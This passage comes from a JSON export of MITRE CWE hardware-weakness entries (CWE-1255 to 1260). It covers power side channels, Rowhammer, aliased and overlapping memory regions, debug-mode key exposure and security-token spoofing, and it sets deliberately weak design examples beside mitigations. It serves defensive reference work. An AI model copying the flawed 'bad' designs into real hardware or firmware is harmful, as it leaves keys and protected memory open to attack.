OK","attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:br":["","","","","","","","","","","","","","","",""]},{"#text":"Among various options for mitigating the string comparison is obscuring the power comsumption by having opposing bit flips during bit operations. Note that in this example, the initial change of the bit values could still provide power indication depending upon the hardware itself. This possibility needs to be measured for verification.static nonvolatile password_tries = NUM_RETRIES;dowhile (password_tries == 0) ; // Hang here if no more password triespassword_tries--;  // Put retry code here to catch partial retriespassword_ok = 0;for (i = 0; i &lt; NUM_PW_DIGITS; i++)if (GetPasswordByte() == stored_password([i])password_ok |= 0x10; // Power consumption hereelsepassword_ok |= 0x01; // is now the same hereendif ((password_ok &amp; 1) == 0)password_tries = NUM_RETRIES;break_to_Ok_to_proceedwhile (true)// Password OK","attr":{"@_Nature":"good"},"xhtml:br":["","","","","","","","","","","","","","","","","",""]},{"#text":"An alternative to the previous example is simply comparing the whole password simultaneously.static nonvolatile password_tries = NUM_RETRIES;dowhile (password_tries == 0) ; // Hang here if no more password triespassword_tries--;  // Put retry code here to catch partial retriesfor (i = 0; i &lt; NUM_PW_DIGITS; i++)stored_password([i] = GetPasswordByte();endif (stored_password == saved_password)password_tries = NUM_RETRIES;break_to_Ok_to_proceedwhile (true)// Password OK","attr":{"@_Nature":"good"},"xhtml:br":["","","","","","","","","","","","","",""]}],"Body_Text":["Since the algorithm uses a different number of 1\'s and 0\'s for password validation, a different amount of power is consumed for the good byte versus the bad byte comparison. Using this information, an attacker may be able to guess the correct password for that byte-by-byte iteration with several repeated attempts by stopping the password evaluation before it completes.","Since the algorithm uses a different number of 1\'s and 0\'s for password validation, a different amount of power is consumed for the good byte versus the bad byte comparison. Using this information, an attacker may be able to guess the correct password for that byte-by-byte iteration with several repeated attempts by stopping the password evaluation before it completes.","Since comparison is done atomically, there is no indication which bytes fail forcing the attacker to brute force the whole password at once. Note that other mitigations may exist such as masking - causing a large current draw to mask individual bit flips."]},{"Intro_Text":"This code demonstrates the transfer of a secret key using Serial-In/Serial-Out shift. It\'s easy to extract the secret using simple power analysis as each shift gives data on a single bit of the key.","Example_Code":[{"#text":"module siso(clk,rst,a,q);input a;input clk,rst;output q;reg q;always@(posedge clk,posedge rst)beginif(rst==1\'b1)q&lt;1\'b0;elseq&lt;a;endendmodule","attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:br":["","","","","","","","","","","","","",""]},{"#text":"module pipo(clk,rst,a,q);input clk,rst;input[3:0]a;output[3:0]q;reg[3:0]q;always@(posedge clk,posedge rst)beginif (rst==1\'b1)q&lt;4\'b0000;elseq&lt;a;endendmodule","attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:br":["","","","","","","","","","","","","",""]}],"Body_Text":"This code demonstrates the transfer of a secret key using a Parallel-In/Parallel-Out shift. In a parallel shift, data confounded by multiple bits of the key, not just one."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2020-12788","Description":"CMAC verification vulnerable to timing and power attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12788"}},"Functional_Areas":{"Functional_Area":"Power"},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"189"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1184"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-05-29"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Functional_Areas, Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Accellera IP Security Assurance (IPSA) Working Group","Contribution_Organization":"Accellera Systems Initiative","Contribution_Date":"2020-09-09","Contribution_Comment":"Submitted new material that could be added to already-existing entry CWE-1255. Added new Potential Mitigations, a new example, an observed example, and an additional reference."}}},"1256":{"attr":{"@_ID":"1256","@_Name":"Improper Restriction of Software Interfaces to Hardware Features","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product provides software-controllable\\n\\t\\t\\tdevice functionality for capabilities such as power and\\n\\t\\t\\tclock management, but it does not properly limit\\n\\t\\t\\tfunctionality that can lead to modification of\\n\\t\\t\\thardware memory or register bits, or the ability to\\n\\t\\t\\tobserve physical side channels.","Extended_Description":{"xhtml:p":["It is frequently assumed that physical attacks\\n              such as fault injection and side-channel analysis\\n              require an attacker to have physical access to the\\n              target device.  This assumption may be false if the\\n              device has improperly secured power management features,\\n              or similar features.  For mobile devices, minimizing\\n              power consumption is critical, but these devices run a\\n              wide variety of applications with different performance\\n              requirements. Software-controllable mechanisms to\\n              dynamically scale device voltage and frequency and\\n              monitor power consumption are common features in today\'s\\n              chipsets, but they also enable attackers to mount fault\\n              injection and side-channel attacks without having\\n              physical access to the device.","Fault injection attacks involve strategic\\n              manipulation of bits in a device to achieve a desired\\n              effect such as skipping an authentication step,\\n              elevating privileges, or altering the output of a\\n              cryptographic operation.  Manipulation of the device\\n              clock and voltage supply is a well-known technique to\\n              inject faults and is cheap to implement with physical\\n              device access.  Poorly protected power management\\n              features allow these attacks to be performed from\\n              software.  Other features, such as the ability to write\\n              repeatedly to DRAM at a rapid rate from unprivileged\\n              software, can result in bit flips in other memory\\n              locations (Rowhammer, [REF-1083]).","Side channel analysis requires gathering\\n\\t\\t\\t  measurement traces of physical quantities such as power\\n\\t\\t\\t  consumption.  Modern processors often include power\\n\\t\\t\\t  metering capabilities in the hardware itself (e.g.,\\n\\t\\t\\t  Intel RAPL) which if not adequately protected enable\\n\\t\\t\\t  attackers to gather measurements necessary for\\n\\t\\t\\t  performing side-channel attacks from software."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Power Management IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Clock/Counter IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"An architect may initiate introduction of\\n\\t\\t\\t\\t\\tthis weakness via exacting requirements for\\n\\t\\t\\t\\t\\tsoftware accessible power/clock management\\n\\t\\t\\t\\t\\trequirements"},{"Phase":"Implementation","Note":"An implementer may introduce this weakness\\n\\t\\t\\t\\t\\tby assuming there are no consequences to unbounded\\n\\t\\t\\t\\t\\tpower and clock management for secure components\\n\\t\\t\\t\\t\\tfrom untrusted ones."}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":["Modify Memory","Modify Application Data","Bypass Protection Mechanism"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"Perform a security evaluation of system-level\\n\\t\\tarchitecture and design with software-aided physical attacks\\n\\t\\tin scope."},{"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":"Use custom software to change registers that control clock settings or power settings to try to bypass security locks, or repeatedly write DRAM to try to change adjacent locations. This can be effective in extracting or changing data. The drawback is that it cannot be run before manufacturing, and it may require specialized software."},"Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"Ensure proper access control mechanisms protect software-controllable features altering physical operating conditions such as clock frequency and voltage."}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This example considers the Rowhammer problem [REF-1083]. The Rowhammer issue was caused by a program in a tight loop writing repeatedly to a location to which the program was allowed to write but causing an adjacent memory location value to change.","Example_Code":[{"#text":"Continuously writing the same value to the same address causes the value of an adjacent location to change value.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"Redesign the RAM devices to reduce inter capacitive coupling making the Rowhammer exploit impossible.","attr":{"@_Nature":"good","@_Language":"Other"}}],"Body_Text":["Preventing the loop required to defeat the Rowhammer exploit is not always possible:","While the redesign may be possible for new devices, a redesign is not possible in existing devices. There is also the possibility that reducing capacitance with a relayout would impact the density of the device resulting in a less capable, more costly device."]},{"Intro_Text":"Suppose a hardware design implements a set of software-accessible registers for scaling clock frequency and voltage but does not control access to these registers. Attackers may cause register and memory changes and race conditions by changing the clock or voltage of the device under their control."},{"Intro_Text":"Consider the following SoC\\n\\t      design. Security-critical settings for scaling clock\\n\\t      frequency and voltage are available in a range of\\n\\t      registers bounded by [PRIV_END_ADDR : PRIV_START_ADDR]\\n\\t      in the tmcu.csr module in the HW Root of Trust. These\\n\\t      values are writable based on the lock_bit register in\\n\\t      the same module. The lock_bit is only writable by\\n\\t      privileged software running on the tmcu.","Body_Text":{"xhtml:img":{"attr":{"@_src":"https://cwe.mitre.org/data/images/HRoT-CWE.png","@_alt":"Hardware Root of Trust"}},"xhtml:p":"We assume that untrusted software running on any of the\\n\\t      Core{0-N} processors has access to the input and output\\n\\t      ports of the hrot_iface. If untrusted software can clear\\n\\t      the lock_bit or write the clock frequency and voltage\\n\\t      registers due to inadequate protection, a fault\\n\\t      injection attack could be performed."}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-11157","Description":"Plundervolt: Improper conditions check in voltage settings for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege and/or information disclosure via local access [REF-1081].","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11157"},{"Reference":"CVE-2020-8694","Description":"PLATYPUS Attack: Insufficient access control in the Linux kernel driver for some Intel processors allows information disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8694"},{"Reference":"CVE-2020-8695","Description":"Observable discrepancy in the RAPL interface for some Intel processors allows information disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8695"},{"Reference":"CVE-2020-12912","Description":"AMD extension to a Linux service does not require privileged access to the RAPL interface, allowing side-channel attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12912"},{"Reference":"CVE-2015-0565","Description":"NaCl in 2015 allowed the CLFLUSH instruction, making Rowhammer attacks possible.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0565"}]},"Functional_Areas":{"Functional_Area":["Power","Clock"]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1081"}},{"attr":{"@_External_Reference_ID":"REF-1082"}},{"attr":{"@_External_Reference_ID":"REF-1083"}},{"attr":{"@_External_Reference_ID":"REF-1225"}},{"attr":{"@_External_Reference_ID":"REF-1217"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Functional_Areas, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"}],"Contribution":[{"attr":{"@_Type":"Content"},"Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-07-16","Contribution_Comment":"Provided Demonstrative Example for Hardware Root of Trust"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Anders Nordstrom, Alric Althoff","Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-10-11","Contribution_Comment":"Provided detection method"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Nicole Fern","Contribution_Organization":"Riscure","Contribution_Date":"2021-10-15","Contribution_Comment":"updated description and extended description, detection method, and observed examples"}]}},"1257":{"attr":{"@_ID":"1257","@_Name":"Improper Access Control Applied to Mirrored or Aliased Memory Regions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Aliased or mirrored memory regions in hardware designs may have inconsistent read/write permissions enforced by the hardware. A possible result is that an untrusted agent is blocked from accessing a memory region but is not blocked from accessing the corresponding aliased memory region.","Extended_Description":{"xhtml:p":["Hardware product designs often need to implement memory protection features that enable privileged software to define isolated memory regions and access control (read/write) policies. Isolated memory regions can be defined on different memory spaces in a design (e.g. system physical address, virtual address, memory mapped IO).","Each memory cell should be mapped and assigned a system address that the core software can use to read/write to that memory. It is possible to map the same memory cell to multiple system addresses such that read/write to any of the aliased system addresses would be decoded to the same memory cell.","This is commonly done in hardware designs for redundancy and simplifying address decoding logic. If one of the memory regions is corrupted or faulty, then that hardware can switch to using the data in the mirrored memory region. Memory aliases can also be created in the system address map if the address decoder unit ignores higher order address bits when mapping a smaller address region into the full system address.","A common security weakness that can exist in such memory mapping is that aliased memory regions could have different read/write access protections enforced by the hardware such that an untrusted agent is blocked from accessing a memory address but is not blocked from accessing the corresponding aliased memory address. Such inconsistency can then be used to bypass the access protection of the primary memory block and read or modify the protected memory.","An untrusted agent could also possibly create memory aliases in the system address map for malicious purposes if it is able to change the mapping of an address region or modify memory region sizes."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Microcontroller IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Network on Chip IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Likelihood":"High"},{"Scope":"Integrity","Impact":"Modify Memory","Likelihood":"High"},{"Scope":"Availability","Impact":"DoS: Instability","Likelihood":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"The checks should be applied for consistency access rights between primary memory regions and any mirrored or aliased memory regions. If different memory protection units (MPU) are protecting the aliased regions, their protected range definitions and policies should be synchronized."},{"Phase":["Architecture and Design","Implementation"],"Description":"The controls that allow enabling memory aliases or changing the size of mapped memory regions should only be programmable by trusted software components."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["In a System-on-a-Chip (SoC) design the system fabric uses 16 bit addresses. An IP unit (Unit_A) has 4 kilobyte of internal memory which is mapped into a 16 kilobyte address range in the system fabric address map.","To protect the register controls in Unit_A unprivileged software is blocked from accessing addresses between 0x0000 \u2013 0x0FFF.","The address decoder of Unit_A masks off the higher order address bits and decodes only the lower 12 bits for computing the offset into the 4 kilobyte internal memory space."],"xhtml:table":{"xhtml:tr":[{"xhtml:td":["System Address","Mapped to"]},{"xhtml:td":["0x0000 \u2013 0x3FFF","Unit_A  registers : 0x0000 \u2013 0x0FFF"]},{"xhtml:td":["0x4000 \u2013 0xFFFF","Other IPs &amp; Memory"]}]}},"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:p":["In this design  the aliased memory address ranges are these:","0x0000 \u2013 0x0FFF","0x1000 \u2013 0x1FFF","0x2000 \u2013 0x2FFF","0x3000 \u2013 0x3FFF","The same register can be accessed using four different addresses: 0x0000, 0x1000, 0x2000, 0x3000.","The system address filter only blocks access to range 0x0000 - 0x0FFF and does not block access to the aliased addresses in 0x1000 - 0x3FFF range. Thus, untrusted software can leverage the aliased memory addresses to bypass the memory protection."],"xhtml:br":""},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:p":["In this design the aliased memory addresses (0x1000 - 0x3FFF) could be blocked from all system software access since they are not used by software.","Alternately, the MPU logic can be changed to apply the memory protection policies to the full address range mapped to Unit_A (0x0000 - 0x3FFF)."]}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns"}}},"1258":{"attr":{"@_ID":"1258","@_Name":"Exposure of Sensitive System Information Due to Uncleared Debug Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The hardware does not fully clear security-sensitive values, such as keys and intermediate values in cryptographic operations, when debug mode is entered.","Extended_Description":{"xhtml:p":"Security sensitive values, keys, intermediate steps of cryptographic operations, etc. are stored in temporary registers in the hardware. If these values are not cleared when debug mode is entered they may be accessed by a debugger allowing sensitive information to be accessible by untrusted parties."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"212","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Whenever debug mode is enabled, all registers containing sensitive assets must be cleared."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A cryptographic core in a System-On-a-Chip (SoC) is used for cryptographic acceleration and implements several cryptographic operations (e.g., computation of AES encryption and decryption, SHA-256, HMAC, etc.). The keys for these operations or the intermediate values are stored in registers internal to the cryptographic core. These internal registers are in the Memory Mapped Input Output (MMIO) space and are blocked from access by software and other untrusted agents on the SoC. These registers are accessible through the debug and test interface.","Example_Code":[{"#text":"In the above scenario, registers that store keys and intermediate values of cryptographic operations are not cleared when system enters debug mode. An untrusted actor running a debugger may read the contents of these registers and gain access to secret keys and other sensitive cryptographic information.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"Whenever the chip enters debug mode, all registers containing security-sensitive data are be cleared rendering them unreadable.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"204"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Related_Attack_Patterns, Relationships"},"Previous_Entry_Name":{"#text":"Sensitive Information Uncleared During Hardware Debug Flows","attr":{"@_Date":"2020-08-20"}}}},"1259":{"attr":{"@_ID":"1259","@_Name":"Improper Restriction of Security Token Assignment","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The System-On-A-Chip (SoC) implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens are improperly protected.","Extended_Description":"Systems-On-A-Chip (Integrated circuits and hardware engines) implement Security Tokens to differentiate and identify which actions originated from which agent. These actions may be one of the directives: \'read\', \'write\', \'program\', \'reset\', \'fetch\', \'compute\', etc. Security Tokens are assigned to every agent in the System that is capable of generating an action or receiving an action from another agent. Multiple Security Tokens may be assigned to an agent and may be unique based on the agent\'s trust level or allowed privileges. Since the Security Tokens are integral for the maintenence of security in an SoC, they need to be protected properly. A common weakness afflicting Security Tokens is improperly restricting the assignment to trusted components. Consequently, an improperly protected Security Token may be able to be programmed by a malicious agent (i.e., the Security Token is mutable) to spoof the action as if it originated from a trusted agent.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1294","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Files or Directories","Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Gain Privileges or Assume Identity","Modify Memory","Modify Memory","DoS: Crash, Exit, or Restart"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:ul":{"xhtml:li":["Security Token assignment review checks for design inconsistency and common weaknesses.","Security-Token definition and programming flow is tested in both pre-silicon and post-silicon testing."]}}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"For example, consider a system with a register for storing an AES key for encryption and decryption. The key is of 128 bits implemented as a set of four 32-bit registers. The key register assets have an associated control register, AES_KEY_ACCESS_POLICY, which provides the necessary access controls. This access-policy register defines which agents may engage in a transaction, and the type of transaction, with the AES-key registers. Each bit in this 32-bit register defines a security Token. There could be a maximum of 32 security Tokens that are allowed access to the AES-key registers. The number of the bit when set (i.e., \u201c1\u201d) allows respective action from an agent whose identity matches the number of the bit and, if \u201c0\u201d (i.e., Clear), disallows the respective action to that corresponding agent.","Body_Text":[{"#text":"Let\u2019s assume the system has two agents: a Main-controller and an Aux-controller. The respective Security Tokens are \u201c1\u201d and \u201c2\u201d.","xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Description","Default"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_3","AES key [96:127] for encryption or decryption",0]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","AES key access register [31:0]",2]}]}},"An agent with Security Token \u201c1\u201d has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers. As per the above access policy, the AES-Key-access policy allows access to the AES-key registers if the security Token is \u201c1\u201d.","The SoC does not properly protect the Security Token of the agents, and, hence, the Aux-controller in the above example can spoof the transaction (i.e., send the transaction as if it is coming from the Main-controller to access the AES-Key registers)"],"Example_Code":[{"#text":"The Aux-controller could program its Security Token to \u201c1\u201d from \u201c2\u201d.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The SoC needs to protect the Security Tokens. None of the agents in the SoC should have the ability to change the Security Token.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements. Currently it is expressed as a general absence of a protection mechanism as opposed to a specific mistake, and the entry\'s name and description could be interpreted as applying to software.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-03-06"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Improper Protection of Security Identifiers","attr":{"@_Date":"2020-08-20"}}}},"1260":{"attr":{"@_ID":"1260","@_Name":"Improper Handling of Overlap Between Protected Memory Ranges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product allows address regions to overlap, which can result in the bypassing of intended memory protection.","Extended_Description":{"xhtml:p":["Isolated memory regions and access control (read/write) policies are used by hardware to protect privileged software. Software components are often allowed to change or remap memory region definitions in order to enable flexible and dynamically changeable memory management by system software.","If a software component running at lower privilege can program a memory address region to overlap with other memory regions used by software running at higher privilege, privilege escalation may be available to attackers. The memory protection unit (MPU) logic can incorrectly handle such an address overlap and allow the lower-privilege software to read or write into the protected memory region, resulting in privilege escalation attack. An address overlap weakness can also be used to launch a denial of service attack on the higher-privilege software memory regions."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design or implementation and identified later during the Testing phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Modify Memory","Read Memory","DoS: Instability"],"Likelihood":"High"}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Create a high privilege memory block of any arbitrary size. Attempt to create a lower privilege memory block with an overlap of the high privilege memory block. If the creation attempt works, fix the hardware. Repeat the test.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"Ensure that memory regions are isolated as intended and that access control (read/write) policies are used by hardware to protect privileged software."}},{"Phase":"Implementation","Description":{"xhtml:p":["For all of the programmable memory protection regions, the memory protection unit (MPU) design can define a priority scheme.","For example: if three memory regions can be programmed (Region_0, Region_1, and Region_2), the design can enforce a priority scheme, such that, if a system address is within multiple regions, then the region with the lowest ID takes priority and the access-control policy of that region will be applied.  In some MPU designs, the priority scheme can also be programmed by trusted software.","Hardware logic or trusted firmware can also check for region definitions and block programming of memory regions with overlapping addresses.","The memory-access-control-check filter can also be designed to apply a policy filter to all of the overlapping ranges, i.e., if an address is within Region_0 and Region_1, then access to this address is only granted if both Region_0 and Region_1 policies allow the access."]},"Effectiveness":"High"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["For example, consider a design with a 16-bit address that has two software privilege levels: Privileged_SW and Non_privileged_SW. To isolate the system memory regions accessible by these two privilege levels, the design supports three memory regions: Region_0, Region_1, and Region_2.","Each region is defined by two 32 bit registers: its range and its access policy.","Certain bits of the access policy are defined symbolically as follows:","For any requests from software, an address-protection filter checks the address range and access policies for each of the three regions, and only allows software access if all three filters allow access.","Consider the following goals for access control as intended by the designer:","The intention is that Non_privileged_SW cannot modify memory region and policies defined by Privileged_SW in Region_0 and Region_1. Thus, it cannot read or write the memory regions that Privileged_SW is using."],"xhtml:ul":[{"xhtml:li":["Address_range[15:0]: specifies the Base address of the region","Address_range[31:16]: specifies the size of the 